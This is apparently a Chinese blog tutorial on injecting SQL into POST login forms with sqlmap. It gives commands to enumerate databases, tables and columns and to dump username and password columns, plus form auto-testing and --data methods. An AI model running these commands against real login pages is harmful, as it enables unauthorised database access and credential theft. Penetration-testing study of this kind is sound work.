POST登陆框注入实战（SQLMAP）

梦里梦外; 2022-03-10 10:54 289阅读 0赞

利用sqlmap进行POST注入，常见的有三种方法:

###    注入方式一： ###

**1. 用Burp抓包，然后保存抓取到的内容。例如：保存为post.txt,然后把它放至某个目录下**

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70][]

**2. 列数据库:**

sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs

注：-r表示加载一个文件，-p指定参数

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 1][]

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 2][]

**3. 猜表**

选择一个数据库，比如选test

sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n -D test --tables

得到user表。

**4. 猜列**

sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n -D test -T user --columns

** 5. 猜数据**

sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n -D test -T user -C “username,password” --dump

###    注入方式二：自动搜索表单的方式     ###

sqlmap.py -u "http://192.168.160.1/sqltest/post.php" --forms

它会有几次消息提示:

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 3][]

do you want to test this form? \[Y/n/q\]  
要测试此表单吗?\[Y/n/q\]  输入"Y"

do you want to fill blank fields with random values? \[Y/n\]  
是否要填充带有随机值的空白字段? \[Y/n\]  输入"Y"

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? \[Y/n\]  
它看起来像后端DBMS是'MySQL'。 是否要跳过特定于其他DBMS的测试负载？ \[Y/n\] 输入"Y"

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? \[Y/n\]  
对于剩余的测试，您想要包括所有针对“MySQL”扩展提供的级别（1）和风险（1）值的测试吗？\[Y/n\]  输入"N"

POST parameter 'n' is vulnerable. Do you want to keep testing the others (if any)? \[y/N\]  
POST参数'n'是脆弱的。 你想继续测试其他（如果有的话）吗？\[y/N\]  输入"N"

do you want to exploit this SQL injection? \[Y/n\]  
你想利用SQL注入？ 输入"Y"

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 4][]

### 注入方式三：指定一个参数的方法 ###

sqlmap -u http://xxx.xxx.com/Login.asp --data "n=1&p=1"

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 5][]

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70]: /images/20220310/2f700aed716c475892d70f828982294b.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 1]: /images/20220310/08d74a25d82e455580a5cd76009d89b0.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 2]: /images/20220310/745dad7bd4644f4abbce238371b67207.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 3]: /images/20220310/96fc5be785da49e593e15a265b4e3c6f.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 4]: /images/20220310/1bc88396a723470d96c043914ac8fa2e.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 5]: /images/20220310/1d1b58a1f2ea4b4d88e4585fb2a73d85.png